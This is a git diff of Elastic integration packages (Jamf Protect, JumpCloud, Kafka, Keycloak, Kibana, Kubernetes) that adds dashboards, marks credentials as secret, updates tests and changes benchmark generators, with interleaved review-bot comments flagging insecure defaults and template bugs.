1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "observer.product : \"Jamf Protect\" and event.module : \"Alerts\" and NOT process.code_signature.signing_id:com.apple.*" + }, + "visualization": { + "columns": [ + { + "columnId": "dcafb40b-e7ea-45e8-8056-40375483b59a", + "isTransposed": false, + "width": 896 + }, + { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "isTransposed": false, + "width": 156 + }, + { + "columnId": "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "isTransposed": false + }, + { + "columnId": "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "isTransposed": false + } + ], + "headerRowHeight": "auto", + "layerId": "26090b76-c5f9-4191-bfef-7ff1d4482507", + "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "description": "Apple's signed binaries are not bound to an TeamID.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "e5f7a9d1-2951-4189-b17b-9657bc27a70e", + "w": 48, + "x": 0, + "y": 82 + }, + "panelIndex": "e5f7a9d1-2951-4189-b17b-9657bc27a70e", + "title": "Top process Signing Information by TeamID", + "type": "lens" + } + ], + "timeRestore": false, + "title": "Jamf Protect", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-12T08:20:22.255Z", + "id": "jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "a8e0995f-628e-43ff-8052-0ec18332c1da:indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1d177394-ad48-4393-b81c-319a894a5686:indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"a5ced168-f931-484a-bf34-898dee052142:indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "35f2db30-0cb1-4d9d-9afe-dce4d8a973c9:indexpattern-datasource-layer-56e39079-aa13-438a-8f1e-39d3d1207797", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2fe17682-0e60-4338-a47a-971521a5e034:indexpattern-datasource-layer-fecd3402-4076-4ff6-8a63-e975ad495ec6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c21c7eaa-0dd6-4360-990c-8ef0dc734f2e:indexpattern-datasource-layer-2c906641-fc29-4d9a-829e-c62e84234311", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c667337a-237f-4002-9f74-4d914712fde5:indexpattern-datasource-layer-9e7e8b50-1080-47d3-8575-2564576e134a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d73b82e9-36bf-4d4b-a8e5-97f2dfa66d08:indexpattern-datasource-layer-7927b71e-c9eb-4afe-baa5-f19e68ca53e2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "273e31c4-09aa-4378-a9e2-280c302ac86c:indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecb673d5-334d-4705-ac46-1f4878937090:indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e5f7a9d1-2951-4189-b17b-9657bc27a70e:indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d1892683-e559-40f2-9b70-90e8e29439f7:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_04593aef-ec66-4a07-a579-13a12d086631:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "jamf_protect-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file 
diff --git a/packages/jamf_protect/kibana/tag/jamf_protect-security-solution-default.json b/packages/jamf_protect/kibana/tag/jamf_protect-security-solution-default.json new file mode 100644 index 00000000000..cd69d4eb5c8 --- /dev/null +++ b/packages/jamf_protect/kibana/tag/jamf_protect-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#D36086", + "description": "", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-08T14:04:04.315Z", + "id": "jamf_protect-security-solution-default", + "managed": true, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/jamf_protect/manifest.yml b/packages/jamf_protect/manifest.yml new file mode 100644 index 00000000000..c6272a0ad93 --- /dev/null +++ b/packages/jamf_protect/manifest.yml 
@@ -0,0 +1,64 @@ +format_version: 1.0.0 +name: jamf_protect +title: Jamf Protect +version: "0.3.0" +description: Receives events from Jamf Protect with Elastic Agent. +type: integration +categories: + - security +release: beta +conditions: + kibana.version: ^8.12.0 +screenshots: + - src: /img/jamfprotect_kibana.png + title: Jamf Protect Kibana + size: 1800x1138 + type: image/png +icons: + - src: /img/jamf_logo.svg + title: Jamf Logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: Jamf Protect + title: Jamf Protect events + description: Receive Jamf Protect events. + inputs: + - type: http_endpoint + title: Receive Jamf Protect Events via HTTP Endpoint + description: Receiving Jamf Protect events. + vars: + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for http endpoint connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: 0.0.0.0 + - name: secret_header + type: text + title: Secret Header + description: The header to check for a specific value specified by `secret.value`. + required: false + show_user: false + - name: secret_value + type: password + title: Secret Value + description: The secret stored in the header name specified by `secret.header`. + required: false + show_user: false + - name: ssl + type: yaml + title: TLS + description: Options for enabling TLS for the listening webhook endpoint. See the [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/configuration-ssl.html) for a list of all options. + multi: false + required: false + show_user: false + default: | + enabled: false + certificate: "/etc/pki/client/cert.pem" + key: "/etc/pki/client/cert.key" +owner: + github: elastic/security-service-integrations + type: partner diff --git a/packages/jumpcloud/changelog.yml b/packages/jumpcloud/changelog.yml index c47bd4ecd49..b203d88a642 100644 --- a/packages/jumpcloud/changelog.yml 
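Review bot: The `http_endpoint` input in this manifest is open by default: `listen_address` defaults to `0.0.0.0`, `secret_header` and `secret_value` are `required: false` and hidden with `show_user: false`, and the `ssl` default is `enabled: false`, so an out-of-the-box policy accepts unauthenticated plaintext POSTs from any host as Jamf Protect alerts. Consider surfacing the two secret vars with `show_user: true` and stating in the input description that a shared-secret header and TLS are strongly recommended; note also that the var descriptions refer to `secret.value` / `secret.header` while the vars are named `secret_value` / `secret_header`. Separately, `secret_value` is `type: password` but gets no `secret: true`, unlike the jumpcloud and kafka manifests in this same change, presumably because `format_version: 1.0.0` predates that attribute; since `kibana.version` already requires `^8.12.0`, moving to a 3.0.x spec would let the value go through Fleet secret storage.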
+++ b/packages/jumpcloud/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.10.0"
+  changes:
+    - description: Set sensitive values as secret.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9127
 - version: "1.9.1"
   changes:
     - description: Changed owners
diff --git a/packages/jumpcloud/data_stream/events/manifest.yml b/packages/jumpcloud/data_stream/events/manifest.yml
index 32d66e04efc..b6d835908ce 100644
--- a/packages/jumpcloud/data_stream/events/manifest.yml
+++ b/packages/jumpcloud/data_stream/events/manifest.yml
@@ -21,11 +21,12 @@ streams:
         show_user: false
         description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
       - name: api_key
-        type: text
+        type: password
         title: JumpCloud Directory Insights API Key
         show_user: true
         required: true
         default: API_KEY
+        secret: true
       - name: starting_point
         type: text
         title: Starting point for event collection relative to now
diff --git a/packages/jumpcloud/manifest.yml b/packages/jumpcloud/manifest.yml
index f176b72d9e0..59820bdfa92 100644
--- a/packages/jumpcloud/manifest.yml
+++ b/packages/jumpcloud/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: jumpcloud
 title: "JumpCloud"
-version: "1.9.1"
+version: "1.10.0"
 description: "Collect logs from JumpCloud Directory as a Service"
 type: integration
 categories:
@@ -9,7 +9,7 @@ categories:
   - security
 conditions:
   kibana:
-    version: "^8.7.1"
+    version: "^8.12.0"
   elastic:
     subscription: "basic"
 screenshots:
diff --git a/packages/juniper_srx/changelog.yml b/packages/juniper_srx/changelog.yml
index ae47a1a1602..cead66527f7 100644
--- a/packages/juniper_srx/changelog.yml
+++ b/packages/juniper_srx/changelog.yml
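Review bot: In the events manifest hunk, `default: API_KEY` is kept on a var that is `required: true` and now `type: password` / `secret: true`, so a policy can be saved with the placeholder satisfying the required check and the placeholder itself presumably lands in Fleet secret storage; the mistake only surfaces as an authentication failure at runtime. Dropping the `default: API_KEY` line makes Fleet demand a real value at configuration time, which is the behaviour one expects from a required credential. The enclosing `vars` list continues outside the hunk.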
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.21.0"
+  changes:
+    - description: Update package spec to 3.0.3.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9235
 - version: "1.20.1"
   changes:
     - description: Changed owners
diff --git a/packages/juniper_srx/manifest.yml b/packages/juniper_srx/manifest.yml
index 51938645fad..e57fbed7a04 100644
--- a/packages/juniper_srx/manifest.yml
+++ b/packages/juniper_srx/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: juniper_srx
 title: Juniper SRX
-version: "1.20.1"
+version: "1.21.0"
 description: Collect logs from Juniper SRX devices with Elastic Agent.
 categories: ["network", "security", "firewall_security"]
 type: integration
diff --git a/packages/kafka/changelog.yml b/packages/kafka/changelog.yml
index 540d78d0100..14b41a8e6c3 100644
--- a/packages/kafka/changelog.yml
+++ b/packages/kafka/changelog.yml
@@ -1,4 +1,19 @@
 # newer versions go on top
+- version: "1.13.0"
+  changes:
+    - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9321
+- version: "1.12.1"
+  changes:
+    - description: Disable secrets for older stack versions due to errors.
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/9279
+- version: "1.12.0"
+  changes:
+    - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9009
 - version: "1.11.0"
   changes:
     - description: Add missing SSL fields to agent config.
diff --git a/packages/kafka/data_stream/consumergroup/manifest.yml b/packages/kafka/data_stream/consumergroup/manifest.yml
index e286b1db4ca..7ef20f36209 100644
--- a/packages/kafka/data_stream/consumergroup/manifest.yml
+++ b/packages/kafka/data_stream/consumergroup/manifest.yml
@@ -15,6 +15,7 @@ streams:
         title: SASL username
       - name: password
         type: password
+        secret: true
         title: SASL password
       - name: mechanism
         type: text
diff --git a/packages/kafka/data_stream/partition/manifest.yml b/packages/kafka/data_stream/partition/manifest.yml
index 34f10f47e80..62f6052253f 100644
--- a/packages/kafka/data_stream/partition/manifest.yml
+++ b/packages/kafka/data_stream/partition/manifest.yml
@@ -16,6 +16,7 @@ streams:
       - name: password
         type: password
         title: SASL password
+        secret: true
       - name: mechanism
         type: text
         title: SASL mechanism
diff --git a/packages/kafka/manifest.yml b/packages/kafka/manifest.yml
index 63287c0d908..48c9b000d17 100644
--- a/packages/kafka/manifest.yml
+++ b/packages/kafka/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: kafka
 title: Kafka
-version: "1.11.0"
+version: "1.13.0"
 description: Collect logs and metrics from Kafka servers with Elastic Agent.
 type: integration
 categories:
@@ -9,7 +9,7 @@ categories:
   - observability
 conditions:
   kibana:
-    version: "^8.8.0"
+    version: "^8.12.0"
   elastic:
     subscription: basic
 screenshots:
@@ -66,8 +66,9 @@ policy_templates:
             title: SSL Private Key
             show_user: true
           - name: ssl.key_passphrase
-            type: text
+            type: password
             title: SSL Key Passphrase
+            secret: true
             show_user: true
           - name: ssl.verification_mode
             type: text
diff --git a/packages/kafka_log/changelog.yml b/packages/kafka_log/changelog.yml
index 671dab2b14c..8bba1522e3e 100644
--- a/packages/kafka_log/changelog.yml
+++ b/packages/kafka_log/changelog.yml
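Review bot: In the `kafka/manifest.yml` policy-template hunk only the passphrase is moved to `type: password` / `secret: true`; the key material it protects, the var whose `title: SSL Private Key` and `show_user: true` lines form the context just above, does not appear to get the same treatment (its `name` and `type` lines are outside the hunk, so confirm). A private key is at least as sensitive as its passphrase, and an unencrypted key has no passphrase at all, so the secret marking here protects the weaker of the two values. Consider adding `secret: true` to the private-key var as well, after checking that the package spec allows it for that var's type.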
@@ -1,3 +1,18 @@
+- version: "1.6.0"
+  changes:
+    - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9321
+- version: 1.5.1
+  changes:
+    - description: Disable secrets for older stack versions due to errors.
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/9279
+- version: 1.5.0
+  changes:
+    - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9009
 - version: 1.4.0
   changes:
     - description: Update the package format_version to 3.0.0.
diff --git a/packages/kafka_log/data_stream/generic/manifest.yml b/packages/kafka_log/data_stream/generic/manifest.yml
index 975f8a8eef6..a544b4efa59 100644
--- a/packages/kafka_log/data_stream/generic/manifest.yml
+++ b/packages/kafka_log/data_stream/generic/manifest.yml
@@ -85,6 +85,7 @@ streams:
       - name: password
         type: password
         title: Password
+        secret: true
         description: Password used for SASL authentication.
         required: false
         show_user: true
@@ -117,6 +118,7 @@ streams:
       - name: kerberos_password
         type: password
         title: Kerberos Password
+        secret: true
         description: If you configured password for Auth Type, you have to provide a password for the selected principal.
         required: false
         show_user: false
diff --git a/packages/kafka_log/manifest.yml b/packages/kafka_log/manifest.yml
index 43b5eb12333..b128b072eed 100644
--- a/packages/kafka_log/manifest.yml
+++ b/packages/kafka_log/manifest.yml
@@ -1,12 +1,12 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: kafka_log
 title: Custom Kafka Logs
 description: Collect data from kafka topic with Elastic Agent.
 type: integration
-version: "1.4.0"
+version: "1.6.0"
 conditions:
   kibana:
-    version: "^7.16.0 || ^8.0.0"
+    version: "^8.12.0"
   elastic:
     subscription: basic
 categories:
diff --git a/packages/keycloak/changelog.yml b/packages/keycloak/changelog.yml index 21d3ba0cca1..73d4d82daa8 100644 --- a/packages/keycloak/changelog.yml +++ b/packages/keycloak/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.21.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 - version: "1.20.1" changes: - description: Changed owners diff --git a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml index 22170cc500e..e73bc1b0eb9 100644 --- a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -14,3 +14,5 @@ numeric_keyword_fields: - log.file.idxhi - log.file.idxlo - log.file.vol +assert: + hit_count: 6 diff --git a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml index eb587fbc368..fd52deb1f15 100644 --- a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml +++ b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml @@ -14,3 +14,5 @@ numeric_keyword_fields: - log.file.idxhi - log.file.idxlo - log.file.vol +assert: + hit_count: 6 diff --git a/packages/keycloak/manifest.yml b/packages/keycloak/manifest.yml index 6c2970e7dfb..4970508ce32 100644 --- a/packages/keycloak/manifest.yml +++ b/packages/keycloak/manifest.yml @@ -1,9 +1,9 @@ name: keycloak title: Keycloak -version: "1.20.1" +version: "1.21.0" description: Collect logs from Keycloak with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: [security, iam] conditions: kibana: 
diff --git a/packages/kibana/changelog.yml b/packages/kibana/changelog.yml index c2b37b9f68f..57d1ac2aecc 100644 --- a/packages/kibana/changelog.yml +++ b/packages/kibana/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.5.2" + changes: + - description: Adding SO name to audit events + type: enhancement + link: https://github.com/elastic/integrations/pull/9318 - version: "2.5.1" changes: - description: Add memory utilization metric diff --git a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log index aea673f2bb9..4c0fca2c675 100644 --- a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log +++ b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log 
@@ -1,3 +1,4 @@ {"event":{"action":"http_request","category":["web"],"outcome":"unknown"},"http":{"request":{"method":"get"}},"url":{"domain":"kibana","path":"/api/fleet/enrollment_api_keys/e0a0d409-b22f-4cd0-b417-c934c621ce07","port":5601,"scheme":"https"},"user":{"name":"elastic","roles":["superuser"]},"kibana":{"space_id":"default"},"trace":{"id":"2eeefc09-26a2-4aea-840d-9170b0a9c95f"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:15:24.041+00:00","message":"User is requesting [/api/fleet/enrollment_api_keys/e0a0d409-b22f-4cd0-b417-c934c621ce07] endpoint","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"858c45e94edb1814"}} {"event":{"action":"user_login","category":["authentication"],"outcome":"success"},"user":{"name":"elastic","roles":["superuser"]},"kibana":{"session_id":"Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=","authentication_provider":"basic","authentication_type":"basic","authentication_realm":"reserved","lookup_realm":"reserved"},"trace":{"id":"5233d304-16b6-479b-9e45-a906107a5f53"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:16:57.990+00:00","message":"User [elastic] has logged in using basic provider [name=basic]","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"2fd40f9b4f4ca767"}} {"event":{"action":"space_get","category":["database"],"type":["access"],"outcome":"success"},"kibana":{"space_id":"default","session_id":"Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=","saved_object":{"type":"space","id":"default"}},"user":{"name":"elastic","roles":["superuser"]},"trace":{"id":"fbed6b3b-4e1c-4525-9597-391d5f718e89"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:16:58.044+00:00","message":"User has accessed space 
[id=default]","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"256b899bfffe8b3f"}} +{"event":{"action":"bulk_get","category":["database"],"type":["access"],"outcome":"success"},"kibana":{"space_id":"default","session_id":"Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=","saved_object":{"type":"fake","id":"1","name":"so_name_1"}},"user":{"name":"elastic","roles":["superuser"]},"trace":{"id":"fbed6b3b-4e1c-4525-9597-391d5f718e89"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:16:58.044+00:00","message":"User has accessed space [id=default]","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"256b899bfffe8b3f"}} diff --git a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json index 1b339b0a9f1..276627c5bc6 100644 --- a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json +++ b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json 
@@ -163,6 +163,62 @@ "superuser" ] } + }, + { + "@timestamp": "2022-09-09T13:16:58.044+00:00", + "ecs": { + "version": "8.4.0" + }, + "event": { + "action": "bulk_get", + "category": [ + "database" + ], + "created": "2022-09-09T13:16:58.044+00:00", + "ingested": "2022-09-09T13:44:23.397440547Z", + "kind": "event", + "outcome": "success", + "type": [ + "access" + ] + }, + "kibana": { + "saved_object": { + "id": "1", + "type": "fake", + "name": "so_name_1" + }, + "session_id": "Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=", + "space_id": "default" + }, + "log": { + "level": "INFO", + "logger": "plugins.security.audit.ecs" + }, + "message": "User has accessed space [id=default]", + "process": { + "pid": 7 + }, + "service": { + "node": { + "roles": [ + "background_tasks", + "ui" + ] + } + }, + "trace": { + "id": "fbed6b3b-4e1c-4525-9597-391d5f718e89" + }, + "transaction": { + "id": "256b899bfffe8b3f" + }, + "user": { + "name": "elastic", + "roles": [ + "superuser" + ] + } } ] } \ No newline at end of file diff --git a/packages/kibana/data_stream/audit/fields/package-fields.yml b/packages/kibana/data_stream/audit/fields/package-fields.yml index 373bfd08e46..4b885147b1c 100644 --- a/packages/kibana/data_stream/audit/fields/package-fields.yml +++ b/packages/kibana/data_stream/audit/fields/package-fields.yml @@ -13,6 +13,9 @@ - name: saved_object.id type: keyword description: The id of the saved object associated with this event. + - name: saved_object.name + type: keyword + description: The name of the saved object associated with this event. - name: add_to_spaces type: keyword description: The set of space ids that a saved object was shared to. diff --git a/packages/kibana/docs/README.md b/packages/kibana/docs/README.md index 6e2edc397f0..1a174bea646 100644 --- a/packages/kibana/docs/README.md +++ b/packages/kibana/docs/README.md 
@@ -47,6 +47,7 @@ UI in Kibana. To enable this usage, set `xpack.enabled: true` on the package con | kibana.delete_from_spaces | The set of space ids that a saved object was removed from. | keyword | | kibana.lookup_realm | The Elasticsearch lookup realm which fulfilled a login event. | keyword | | kibana.saved_object.id | The id of the saved object associated with this event. | keyword | +| kibana.saved_object.name | The name of the saved object associated with this event. | keyword | | kibana.saved_object.type | The type of the saved object associated with this event. | keyword | | kibana.session_id | The ID of the user session associated with this event. Each login attempt results in a unique session id. | keyword | | kibana.space_id | The id of the space associated with this event. | keyword | diff --git a/packages/kibana/manifest.yml b/packages/kibana/manifest.yml index 3ea94ce64bf..11a16bcc765 100644 --- a/packages/kibana/manifest.yml +++ b/packages/kibana/manifest.yml @@ -1,6 +1,6 @@ name: kibana title: Kibana -version: 2.5.1 +version: 2.5.2 description: Collect logs and metrics from Kibana with Elastic Agent. type: integration icons: diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml index 1a606694724..f49a559cf9c 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml @@ -1,10 +1,10 @@ --- -description: Benchmark 864000 kubernetes.container events ingested +description: Benchmark 8640000 kubernetes.container events ingested data_stream: name: container corpora: generator: - total_events: 864000 + total_events: 8640000 template: type: gotext path: ./container-benchmark/template.ndjson 
diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml index f6dfffb2b59..921fbadd6d4 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml @@ -37,10 +37,27 @@ fields: range: min: 0 max: 10000 - - name: Percentage + - name: PercentageMemory range: - min: 0 - max: 5000 - fuzziness: 0.005 + min: 0.0 + max: 1.0 + - name: PercentageCPU + range: + min: 0.0 + max: 1.0 + - name: usage.* + object_keys: + - nanoseconds + - nanocores + - name: usage.nanoseconds + range: + min: 100000 + max: 9000000000 + cardinality: 10000 + - name: usage.nanocores + range: + min: 100000 + max: 9000000 + cardinality: 10000 - name: container.name enum: ["web", "default-http-backend", "dnsmasq", "csi-driver", "web", "web", "web", "prometheus", "konnectivity-agent", "sidecar", "kubedns", "metrics-server-nanny", "web", "web", "fluentbit", "autoscaler", "gke-metrics-agent", "elastic-agent", "web", "kube-state-metrics", "metrics-server", "fluentbit", "elastic-agent", "web", "prometheus-to-sd-exporter"] diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml index cd8bc3e997d..1e2eb7cefb7 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml @@ -22,8 +22,17 @@ type: long - name: Ip type: ip -- name: Percentage +- name: PercentageMemory type: double +- name: PercentageCPU + type: double +- name: usage + type: group + fields: + - name: nanoseconds + type: integer + - name: nanocores + type: integer - name: rangeofid type: integer - name: agent.snapshot 
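Review bot: The new `usage.nanoseconds` generator range in `config.yml` runs to `max: 9000000000`, while `fields.yml` in the same change declares `usage.nanoseconds` as `type: integer`; if the generator honours that as a signed 32-bit integer (maximum 2147483647), the upper part of the range will wrap or be rejected before the template multiplies the value by 1000 again. Declaring the two new fields as `type: long` (`- name: nanoseconds` / `type: long`, and likewise for `nanocores`), or lowering `max` to fit a 32-bit value, keeps the corpus consistent with the magnitudes the template is meant to emit for `container.cpu.usage.core.ns`. Whether `cardinality: 10000` is honoured for `range` fields is not visible here, so confirm that too.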
diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson index 53226c74037..6cfd742845c 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson @@ -5,19 +5,22 @@ {{- $agentEphemeralid := generate "agent.ephemeral_id" -}} {{- $timestamp := generate "timestamp" }} {{- $faults := generate "faults" -}} -{{- $pct := generate "Percentage" -}} +{{- $pctmem := generate "PercentageMemory" }} +{{- $pctcpu := generate "PercentageCPU" }} +{{- $usage_nanoseconds := generate "usage.nanoseconds" | mul 1000 -}} +{{- $usage_nanocores := generate "usage.nanocores" | mul 1000 -}} {{- $rangeofid := generate "rangeofid" -}} {{- $nodeid := div $rangeofid 110 -}} {{- $name := generate "container.name" -}} { "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", "container":{ "memory":{ - "usage": {{divf $pct 1000000}} + "usage": {{$pctmem}} }, "name":"{{ $name }}", "runtime":"containerd", "cpu":{ - "usage": {{divf $pct 1000000}} + "usage": {{$pctcpu}} }, "id":"container-{{ $rangeofid }}" }, @@ -31,11 +34,11 @@ "majorpagefaults": {{ $faults }}, "usage":{ "node":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctmem}} }, "bytes": {{generate "Bytes"}}, "limit":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctmem}} } }, "available":{ @@ -44,7 +47,7 @@ "workingset":{ "bytes": {{generate "Bytes"}}, "limit":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctmem}} } }, "pagefaults": "{{ $faults }}" @@ -67,14 +70,14 @@ "cpu":{ "usage":{ "core":{ - "ns": 41129679 + "ns": {{$usage_nanoseconds}} }, "node":{ - "pct": {{divf $pct 1000000}} + "pct": {{ $pctcpu}} }, - "nanocores":0, + "nanocores":{{$usage_nanocores}}, "limit":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctcpu}} } } }, 
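Review bot: The two new assignments `{{- $pctmem := generate "PercentageMemory" }}` and `{{- $pctcpu := generate "PercentageCPU" }}` drop the trailing `-}}` that every neighbouring assignment uses, so the newline after each one is emitted into the output before the JSON object starts; for an NDJSON corpus that is at best stray blank lines and at worst a record the consumer rejects, depending on how the generator splits output. Closing them as `{{- $pctmem := generate "PercentageMemory" -}}` and `{{- $pctcpu := generate "PercentageCPU" -}}` restores the existing pattern, and `{{ $pctcpu}}` in the cpu `node.pct` line should read `{{$pctcpu}}` like its siblings. The template body continues beyond the last hunk.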
